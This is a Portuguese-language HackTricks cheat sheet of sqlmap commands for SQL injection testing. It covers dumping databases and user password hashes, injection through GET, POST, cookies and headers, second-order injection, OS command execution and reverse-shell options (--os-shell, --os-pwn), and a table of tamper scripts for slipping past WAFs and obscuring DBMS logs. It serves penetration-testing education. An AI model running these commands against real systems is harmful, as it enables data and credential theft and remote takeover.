Aprenda hacking em AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)! Outras formas de apoiar o HackTricks: * Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos * **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
# Argumentos básicos para SQLmap ## Genérico ```bash -u "" -p "" --user-agent=SQLMAP --random-agent --threads=10 --risk=3 #MAX --level=5 #MAX --dbms="" --os="" --technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ") --batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers --auth-type="" #HTTP authentication type (Basic, Digest, NTLM or PKI) --auth-cred="" #HTTP authentication credentials (name:password) --proxy=PROXY ``` ## Recuperar Informações ### Interno ```bash --current-user #Get current user --is-dba #Check if current user is Admin --hostname #Get hostname --users #Get usernames od DB --passwords #Get passwords of users in DB ``` ### Dados do DB ```bash --all #Retrieve everything --dump #Dump DBMS database table entries --dbs #Names of the available databases --tables #Tables of a database ( -D ) --columns #Columns of a table ( -D -T ) -D -T
-C #Dump column ``` # Local da Injeção ## A partir da captura do Burp/ZAP Capture a requisição e crie um arquivo req.txt ```bash sqlmap -r req.txt --current-user ``` ## Injeção em Requisição GET ```bash sqlmap -u "http://example.com/?id=1" -p id sqlmap -u "http://example.com/?id=*" -p id ``` ## Injeção em Requisição POST ```bash sqlmap -u "http://example.com" --data "username=*&password=*" ``` ## Injeções em Cabeçalhos e outros Métodos HTTP ```bash #Inside cookie sqlmap -u "http://example.com" --cookie "mycookies=*" #Inside some header sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*" sqlmap -u "http://example.com" --headers="referer:*" #PUT Method sqlmap --method=PUT -u "http://example.com" --headers="referer:*" #The injection is located at the '*' ``` ## Injeção de segunda ordem ```bash python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3 sqlmap -r 1.txt -dbms MySQL -second-order "http:///joomla/administrator/index.php" -D "joomla" -dbs ``` ## Shell ```bash #Exec command python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami #Simple Shell python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell #Dropping a reverse-shell / meterpreter python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn ``` ## Rastrear um site com SQLmap e auto-exploração ```bash sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3 --batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers --crawl = how deep you want to crawl a site --forms = Parse and test forms ``` # Personalizando a Injeção ## Definir um sufixo ```bash python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- " ``` ## Prefixo ```bash python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') " ``` ## Ajuda para encontrar injeção booleana ```bash # The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection) sqlmap -r r.txt -p id --not-string ridiculous --batch ``` ## Tamper ```bash --tamper=name_of_the_tamper #In kali you can see all the tampers in /usr/share/sqlmap/tamper ``` | Tamper | Descrição | | :--- | :--- | | apostrophemask.py | Substitui o caractere apóstrofo pela sua contraparte em largura total UTF-8 | | apostrophenullencode.py | Substitui o caractere apóstrofo por sua contraparte ilegal em unicode duplo | | appendnullbyte.py | Acrescenta caractere byte NULL codificado no final do payload | | base64encode.py | Codifica em Base64 todos os caracteres de um dado payload | | between.py | Substitui o operador maior que \('>'\) por 'NOT BETWEEN 0 AND \#' | | bluecoat.py | Substitui o caractere de espaço após a instrução SQL por um caractere em branco aleatório válido. Posteriormente substitui o caractere = pelo operador LIKE | | chardoubleencode.py | Codifica duas vezes a URL de todos os caracteres em um dado payload \(não processando os já codificados\) | | commalesslimit.py | Substitui instâncias como 'LIMIT M, N' por 'LIMIT N OFFSET M' | | commalessmid.py | Substitui instâncias como 'MID\(A, B, C\)' por 'MID\(A FROM B FOR C\)' | | concat2concatws.py | Substitui instâncias como 'CONCAT\(A, B\)' por 'CONCAT\_WS\(MID\(CHAR\(0\), 0, 0\), A, B\)' | | charencode.py | Codifica a URL de todos os caracteres em um dado payload \(não processando os já codificados\) | | charunicodeencode.py | Codifica em unicode-url caracteres não codificados em um dado payload \(não processando os já codificados\). "%u0022" | | charunicodeescape.py | Codifica em unicode-url caracteres não codificados em um dado payload \(não processando os já codificados\). "\u0022" | | equaltolike.py | Substitui todas as ocorrências do operador igual \('='\) pelo operador 'LIKE' | | escapequotes.py | Escapa aspas \(' e "\) com barra invertida | | greatest.py | Substitui o operador maior que \('>'\) pelo equivalente 'GREATEST' | | halfversionedmorekeywords.py | Adiciona comentário MySQL versionado antes de cada palavra-chave | | ifnull2ifisnull.py | Substitui instâncias como 'IFNULL\(A, B\)' por 'IF\(ISNULL\(A\), B, A\)' | | modsecurityversioned.py | Envolve a consulta completa com comentário versionado | | modsecurityzeroversioned.py | Envolve a consulta completa com comentário versionado zero | | multiplespaces.py | Adiciona múltiplos espaços ao redor das palavras-chave SQL | | nonrecursivereplacement.py | Substitui palavras-chave SQL predefinidas por representações adequadas para substituição \(por exemplo, .replace\("SELECT", ""\)\) filtros | | percentage.py | Adiciona um sinal de porcentagem \('%'\) na frente de cada caractere | | overlongutf8.py | Converte todos os caracteres em um dado payload \(não processando os já codificados\) | | randomcase.py | Substitui cada caractere de palavra-chave por um valor de caixa aleatória | | randomcomments.py | Adiciona comentários aleatórios às palavras-chave SQL | | securesphere.py | Acrescenta uma string especialmente elaborada | | sp\_password.py | Acrescenta 'sp\_password' ao final do payload para obfuscação automática dos logs do DBMS | | space2comment.py | Substitui o caractere de espaço \(' '\) por comentários | | space2dash.py | Substitui o caractere de espaço \(' '\) por um comentário de traço \('--'\) seguido por uma string aleatória e uma nova linha \('\n'\) | | space2hash.py | Substitui o caractere de espaço \(' '\) por um caractere de cerquilha \('\#'\) seguido por uma string aleatória e uma nova linha \('\n'\) | | space2morehash.py | Substitui o caractere de espaço \(' '\) por um caractere de cerquilha \('\#'\) seguido por uma string aleatória e uma nova linha \('\n'\) | | space2mssqlblank.py | Substitui o caractere de espaço \(' '\) por um caractere em branco aleatório de um conjunto válido de caracteres alternativos | | space2mssqlhash.py | Substitui o caractere de espaço \(' '\) por um caractere de cerquilha \('\#'\) seguido por uma nova linha \('\n'\) | | space2mysqlblank.py | Substitui o caractere de espaço \(' '\) por um caractere em branco aleatório de um conjunto válido de caracteres alternativos | | space2mysqldash.py | Substitui o caractere de espaço \(' '\) por um comentário de traço \('--'\) seguido por uma nova linha \('\n'\) | | space2plus.py | Substitui o caractere de espaço \(' '\) por um mais \('+'\) | | space2randomblank.py | Substitui o caractere de espaço \(' '\) por um caractere em branco aleatório de um conjunto válido de caracteres alternativos | | symboliclogical.py | Substitui os operadores lógicos AND e OR pelos seus equivalentes simbólicos \(&& e \| | | unionalltounion.py | Substitui UNION ALL SELECT por UNION SELECT | | unmagicquotes.py | Substitui o caractere de aspas \('\) por uma combinação de multi-bytes %bf%27 junto com um comentário genérico no final \(para que funcione\) | | uppercase.py | Substitui cada caractere de palavra-chave por um valor em caixa alta 'INSERT' | | varnish.py | Acrescenta um cabeçalho HTTP 'X-originating-IP' | | versionedkeywords.py | Encerra cada palavra-chave não-funcional com comentário MySQL versionado | | versionedmorekeywords.py | Encerra cada palavra-chave com comentário MySQL versionado | | xforwardedfor.py | Acrescenta um cabeçalho HTTP falso 'X-Forwarded-For' |
Aprenda AWS hacking do zero ao herói com htARTE (HackTricks AWS Red Team Expert)! Outras formas de apoiar o HackTricks: * Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Obtenha o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos * **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga** me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Compartilhe suas dicas de hacking enviando PRs para os repositórios do github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).